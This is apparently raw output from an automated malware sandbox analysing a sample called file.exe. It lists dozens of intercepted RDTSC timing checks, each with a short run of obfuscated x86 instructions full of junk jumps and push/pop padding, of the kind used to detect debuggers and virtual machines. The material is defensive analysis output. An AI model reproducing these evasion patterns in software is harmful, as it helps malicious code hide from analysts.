                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1215A06 second address: 1215A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1215A0C second address: 1215A4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7ADCEF914Ah 0x00000009 popad 0x0000000a js 00007F7ADCEF915Ch 0x00000010 jmp 00007F7ADCEF9156h 0x00000015 popad 0x00000016 pushad 0x00000017 push edx 0x00000018 jg 00007F7ADCEF9146h 0x0000001e pop edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jns 00007F7ADCEF9146h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1215A4B second address: 1215A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121AC04 second address: 121AC33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007F7ADCEF9154h 0x0000000b jmp 00007F7ADCEF914Ah 0x00000010 jmp 00007F7ADCEF914Ah 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121AC33 second address: 121ACA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCB968CCh 0x00000007 pushad 0x00000008 jmp 00007F7ADCB968D9h 0x0000000d jmp 00007F7ADCB968D8h 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jl 00007F7ADCB968E1h 0x0000001d jne 00007F7ADCB968C6h 0x00000023 jmp 00007F7ADCB968D5h 0x00000028 js 00007F7ADCB968C8h 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121ACA1 second address: 121ACA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121AF1C second address: 121AF44 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7ADCB968C6h 0x00000008 jbe 00007F7ADCB968C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F7ADCB968D8h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121AF44 second address: 121AF4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121AF4A second address: 121AF4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121AF4E second address: 121AF52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121B0A2 second address: 121B0A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121B0A8 second address: 121B0AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1220D34 second address: 1220D3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1220D3A second address: 1220D52 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7ADCEF9146h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jno 00007F7ADCEF914Ch 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121F6D0 second address: 121F6E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7ADCB968C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121F6E0 second address: 121F6E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121FAE3 second address: 121FAE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121FAE7 second address: 121FB05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F7ADCEF9151h 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121FC97 second address: 121FCE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F7ADCB968D5h 0x0000000b push edi 0x0000000c jmp 00007F7ADCB968D9h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pop edi 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F7ADCB968D2h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C8096 second address: 11C812A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCEF914Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F7ADCEF914Ah 0x00000010 jg 00007F7ADCEF915Ch 0x00000016 popad 0x00000017 nop 0x00000018 mov edx, dword ptr [ebp+122D1A5Ah] 0x0000001e mov ebx, dword ptr [ebp+1247903Eh] 0x00000024 push 00000000h 0x00000026 push eax 0x00000027 call 00007F7ADCEF9148h 0x0000002c pop eax 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 add dword ptr [esp+04h], 0000001Ch 0x00000039 inc eax 0x0000003a push eax 0x0000003b ret 0x0000003c pop eax 0x0000003d ret 0x0000003e movsx edx, cx 0x00000041 add eax, ebx 0x00000043 call 00007F7ADCEF9151h 0x00000048 mov ecx, dword ptr [ebp+122D2964h] 0x0000004e pop ecx 0x0000004f mov edx, dword ptr [ebp+122D2A59h] 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b pop eax 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C812A second address: 11C8130 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C8130 second address: 11C8136 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C8136 second address: 11C813A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C813A second address: 11C8175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jo 00007F7ADCEF914Ch 0x00000011 add dword ptr [ebp+122D1B7Eh], edi 0x00000017 push 00000004h 0x00000019 movsx edx, si 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push esi 0x00000021 pop esi 0x00000022 jmp 00007F7ADCEF9158h 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121FE63 second address: 121FE81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 jmp 00007F7ADCB968D3h 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1220A77 second address: 1220A91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCEF914Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F7ADCEF914Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1223B4F second address: 1223B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007F7ADCB968D1h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1223B69 second address: 1223B6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122353D second address: 1223543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1223543 second address: 1223565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jmp 00007F7ADCEF9158h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1223891 second address: 12238A5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7ADCB968C6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007F7ADCB968C8h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12238A5 second address: 12238AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1229D9B second address: 1229DD8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7ADCB968C6h 0x00000008 jmp 00007F7ADCB968D4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnl 00007F7ADCB968D7h 0x00000015 jo 00007F7ADCB968CCh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122A39A second address: 122A3A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122A69E second address: 122A6A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122A6A2 second address: 122A6A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122ABAE second address: 122ABC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7ADCB968CAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122ABC1 second address: 122ABC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122F707 second address: 122F726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F7ADCB968CFh 0x0000000a jc 00007F7ADCB968E4h 0x00000010 push eax 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122ED4F second address: 122ED5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EEBC second address: 122EEC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EEC0 second address: 122EECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EECA second address: 122EED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EED0 second address: 122EED4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122F00A second address: 122F036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7ADCB968D4h 0x00000009 jmp 00007F7ADCB968CBh 0x0000000e popad 0x0000000f js 00007F7ADCB968CCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122F1A1 second address: 122F1AD instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7ADCEF914Eh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122F3FD second address: 122F40C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F7ADCB968C6h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122F40C second address: 122F416 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7ADCEF9146h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1230CB2 second address: 1230CB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123D8AF second address: 123D8C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 ja 00007F7ADCEF9146h 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f jnp 00007F7ADCEF914Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123D8C6 second address: 123D8D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jno 00007F7ADCB968C6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123D8D4 second address: 123D8D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123D8D8 second address: 123D8DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123DE6A second address: 123DE6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123DFD5 second address: 123DFF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCB968CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push ecx 0x0000000b pushad 0x0000000c jmp 00007F7ADCB968CDh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123E162 second address: 123E17D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7ADCEF914Bh 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d jl 00007F7ADCEF914Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123EEC8 second address: 123EECC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123EECC second address: 123EEFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7ADCEF9146h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F7ADCEF914Eh 0x00000012 jmp 00007F7ADCEF914Fh 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a pop eax 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123EEFB second address: 123EF12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCB968CDh 0x00000007 jne 00007F7ADCB968D2h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123CEF9 second address: 123CEFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12536E7 second address: 12536EC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12558D4 second address: 12558E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCEF914Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125BBE4 second address: 125BBF2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F7ADCB968C6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125BBF2 second address: 125BBFC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7ADCEF9146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125BBFC second address: 125BC08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F7ADCB968C6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125BC08 second address: 125BC1C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F7ADCEF9176h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125BC1C second address: 125BC20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264687 second address: 126468D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126468D second address: 12646A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCB968D1h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12646A4 second address: 12646AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12646AA second address: 12646AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126451B second address: 1264525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F7ADCEF9146h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264525 second address: 1264534 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F7ADCB968C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264534 second address: 1264539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126D15D second address: 126D161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126D2C5 second address: 126D2DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCEF914Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126D5EA second address: 126D5EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126D765 second address: 126D76F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7ADCEF914Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126E4B6 second address: 126E4E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F7ADCB968C6h 0x0000000a pop eax 0x0000000b pushad 0x0000000c jng 00007F7ADCB968C6h 0x00000012 jmp 00007F7ADCB968D6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127230B second address: 127231D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7ADCEF9146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F7ADCEF9146h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127231D second address: 127234B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCB968D3h 0x00000007 jmp 00007F7ADCB968D7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127234B second address: 1272355 instructions: 0x00000000 rdtsc 0x00000002 js 00007F7ADCEF9152h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1272355 second address: 127235B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127235B second address: 1272362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1271DF1 second address: 1271DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 ja 00007F7ADCB968C6h 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1271DFE second address: 1271E08 instructions: 0x00000000 rdtsc 0x00000002 js 00007F7ADCEF9152h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1271E08 second address: 1271E1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F7ADCB968C6h 0x0000000a pushad 0x0000000b je 00007F7ADCB968C6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127518A second address: 12751E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCEF9159h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007F7ADCEF914Eh 0x00000011 push esi 0x00000012 jmp 00007F7ADCEF9157h 0x00000017 pushad 0x00000018 popad 0x00000019 pop esi 0x0000001a jc 00007F7ADCEF9148h 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushad 0x00000025 popad 0x00000026 pushad 0x00000027 popad 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12751E3 second address: 12751EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F7ADCB968C6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1282AF4 second address: 1282B0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCEF9156h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1290785 second address: 12907B0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c jmp 00007F7ADCB968D3h 0x00000011 pop edx 0x00000012 jmp 00007F7ADCB968CBh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1292F8E second address: 1292F99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1292F99 second address: 1292F9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A3CB4 second address: 12A3CD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCEF9158h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
